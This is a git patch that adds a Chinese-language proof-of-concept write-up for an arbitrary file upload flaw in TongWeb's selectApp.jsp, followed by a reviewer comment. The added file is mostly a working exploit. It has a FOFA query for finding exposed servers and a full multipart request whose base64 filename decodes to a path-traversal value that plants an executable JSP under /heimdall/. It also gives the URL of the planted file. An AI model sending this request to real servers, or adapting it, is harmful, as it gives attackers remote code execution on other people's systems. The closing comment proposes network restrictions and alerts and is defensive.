From a331a133a29ed81519ead3ea698592a7ae14a5c3 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 7 Apr 2024 18:40:32 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=B8=9C=E6=96=B9=E9=80=9ATongWeb-sel?= =?UTF-8?q?ectApp.jsp=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...通TongWeb-selectApp.jsp存在任意文件上传.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 东方通TongWeb-selectApp.jsp存在任意文件上传.md
diff --git a/东方通TongWeb-selectApp.jsp存在任意文件上传.md b/东方通TongWeb-selectApp.jsp存在任意文件上传.md
new file mode 100644
index 0000000..a595577
--- /dev/null
+++ b/东方通TongWeb-selectApp.jsp存在任意文件上传.md
@@ -0,0 +1,35 @@
+## 东方通TongWeb-selectApp.jsp存在任意文件上传
+
+## fofa
+```
+header="TongWeb Server" || banner="Server: TongWeb Server"
+```
+
+## poc
+```
+POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1
+Host:
+Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c
+User-Agent: Mozilla/5.0
+
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="app_fileName"
+
+Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="app"
+
+
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="className"
+
+test
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="uploadApp"; filename="test.jar"
+Content-Type: application/java-archive
+
+<% out.println(16156223+223415616); %>
+--fa2ef860e94d564632e291131d20064c--
+```
+
+文件上传路径:`http://ip/heimdall/123qwe1.jsp`
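Review bot: The write-up stops at the uploaded file's URL and gives no affected TongWeb versions, vendor fix or detection guidance, so a reader cannot tell whether a deployment is exposed or whether it has already been abused. It also never states that the `app_fileName` value is base64 for `../../applications/heimdall/123qwe1.jsp`, which is apparently the path traversal that lands the uploaded content under `/heimdall/` despite the `test.jar` filename. I would add a short closing section such as `## 修复与检测` covering three points: restrict the `/heimdall/` console to management networks, alert on POSTs to `/heimdall/pages/cla/selectApp.jsp` whose decoded `app_fileName` contains `../`, and audit the heimdall application directory for unexpected `.jsp` files. Affected and fixed versions should be taken from the vendor advisory rather than guessed.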